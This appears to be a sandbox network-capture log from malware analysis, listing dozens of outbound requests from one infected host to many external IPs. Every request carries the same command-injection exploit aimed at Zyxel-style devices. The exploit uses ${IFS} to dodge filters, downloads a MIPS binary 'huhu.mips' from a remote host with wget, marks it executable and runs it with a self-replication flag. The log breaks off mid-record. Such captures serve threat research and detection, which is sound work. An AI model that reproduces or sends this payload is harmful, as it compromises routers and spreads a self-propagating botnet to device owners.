                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047326088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9003192.168.2.1449552170.183.101.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047369957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9004192.168.2.145231860.3.41.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047411919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9005192.168.2.1456222223.10.198.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047439098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9006192.168.2.1432852195.9.20.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047492027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9007192.168.2.1450172209.96.163.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047534943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9008192.168.2.1438412125.195.46.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047581911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9009192.168.2.144151667.125.124.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047611952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9010192.168.2.1447766161.242.10.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047666073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9011192.168.2.144156666.75.219.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047713041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9012192.168.2.1442006199.40.8.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047736883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9013192.168.2.1451396185.131.67.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047766924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9014192.168.2.1442948126.183.162.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047806978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9015192.168.2.144504820.46.25.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047827959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9016192.168.2.1437688195.186.23.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047877073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9017192.168.2.1449428210.145.0.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047924995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9018192.168.2.145534647.134.105.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047955990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9019192.168.2.1442914107.230.97.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047990084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9020192.168.2.144971684.23.91.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048022985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9021192.168.2.1451008158.31.227.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048060894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9022192.168.2.145152879.76.202.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048095942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9023192.168.2.143278837.61.62.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048127890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9024192.168.2.1450364128.188.241.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048175097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9025192.168.2.1436416124.143.216.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048232079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9026192.168.2.1456854150.104.138.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048273087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9027192.168.2.1446190156.171.92.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048321009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9028192.168.2.1457514106.222.94.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048355103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9029192.168.2.1459194126.80.147.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048410892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9030192.168.2.144761481.73.91.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048427105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9031192.168.2.144121620.213.100.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048477888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9032192.168.2.145184669.213.26.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048501968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9033192.168.2.14601742.145.51.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048536062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9034192.168.2.1434734198.189.48.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048580885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9035192.168.2.1450128185.180.220.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048624039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9036192.168.2.1446436189.40.92.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048687935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9037192.168.2.1438228107.133.93.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048722982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9038192.168.2.1436312126.234.119.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048768044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9039192.168.2.1441754169.121.117.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048815966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9040192.168.2.1449222153.181.96.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048846960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9041192.168.2.145894693.87.63.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048897028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9042192.168.2.1453746102.224.137.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048939943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9043192.168.2.143663846.193.122.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048975945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9044192.168.2.144929013.192.43.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.048995018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9045192.168.2.144583869.39.231.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049072981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9046192.168.2.143567870.98.131.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049103975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9047192.168.2.144787850.90.214.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049166918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9048192.168.2.144125095.205.237.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049180984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9049192.168.2.1449580131.178.156.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049211025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9050192.168.2.1456932109.79.253.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049266100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9051192.168.2.1445244173.159.192.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049288988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9052192.168.2.1433492117.77.54.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049343109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9053192.168.2.1459642165.165.219.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049381971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9054192.168.2.1447348157.255.198.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049427986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9055192.168.2.145926238.40.73.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049489975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9056192.168.2.144563873.161.76.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049529076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9057192.168.2.144438640.136.189.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049555063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9058192.168.2.144395050.228.69.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049618006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9059192.168.2.1457096191.65.187.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049657106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9060192.168.2.1446034129.205.186.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049700975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9061192.168.2.1459476170.195.223.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049746990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9062192.168.2.143773217.167.22.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049804926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9063192.168.2.1455584131.160.39.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049859047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9064192.168.2.1447124176.147.235.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049911022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9065192.168.2.144922025.106.156.151443
                                                      TimestampBytes transferredDirectionData
